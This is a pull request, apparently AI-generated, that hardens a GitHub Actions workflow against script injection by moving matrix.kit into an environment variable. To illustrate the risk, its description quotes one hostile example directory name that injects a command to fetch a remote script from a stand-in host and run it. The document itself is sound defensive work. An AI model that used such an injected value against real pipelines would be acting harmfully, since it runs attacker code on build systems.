### PR TITLE
ci(tck): pass matrix.kit via env to avoid shell interpolation

### DIFF
--- a/.github/workflows/tck.yml
+++ b/.github/workflows/tck.yml
@@ -83,8 +83,10 @@ jobs:
           go-version-file: go.mod
 
       - name: Run TCK for ${{ matrix.kit }}
+        env:
+          KIT: ${{ matrix.kit }}
         run: |
-          cd ${{ matrix.kit }}
+          cd "$KIT"
           go test -v -timeout 30m -count=1 ./...
 
   test-tck:


### PR DESCRIPTION
## Summary

Harden `.github/workflows/tck.yml` by passing `matrix.kit` through an environment variable instead of interpolating `${{ matrix.kit }}` directly into a `run:` shell block.

## Why

`matrix.kit` is built from kit directory names (`*/spec.yaml`) found in the checked-out tree. On a fork PR, those directory names are attacker-controlled. A directory named e.g. `foo; curl evil.sh|sh #` would land verbatim inside:

```yaml
run: |
  cd ${{ matrix.kit }}
  go test -v -timeout 30m -count=1 ./...
```

…which is the [GitHub Actions script-injection pattern](https://github.blog/security/vulnerability-research/how-to-catch-github-actions-workflow-injections-before-attackers-do/) — the same shape used in the recent teamPCP/Trivy-class incidents.

**Practical blast radius today is near zero**, because:
- the trigger is `pull_request` (not `pull_request_target`),
- the runner already has the fork's code checked out,
- `GITHUB_TOKEN` is read-only on fork PRs,
- no repo secrets are exposed.

So an attacker would just be running their own code on a runner that's already running their own code. But it's free to harden, and prevents the pattern from being copy-pasted somewhere it would matter.

## Change

```diff
       - name: Run TCK for ${{ matrix.kit }}
+        env:
+          KIT: ${{ matrix.kit }}
         run: |
-          cd ${{ matrix.kit }}
+          cd "$KIT"
           go test -v -timeout 30m -count=1 ./...
```

The `name:` field is left as-is — names aren't shell-evaluated.

## Test plan
- [ ] CI runs (existing TCK matrix should still resolve `$KIT` correctly to each kit directory)
- [ ] No behavior change for legitimate kit directory names

## Context

Found while doing a hardening pass on the repo's GHA surface against the script-injection / pull_request_target / unpinned-action attack classes. Everything else in this repo's workflows looks great — actions pinned to SHAs, top-level `permissions: {}`, `persist-credentials: false`, no `pull_request_target`, no `secrets: inherit`. This was the only nit worth fixing.

🤖 Generated with [Claude Code](https://claude.com/claude-code)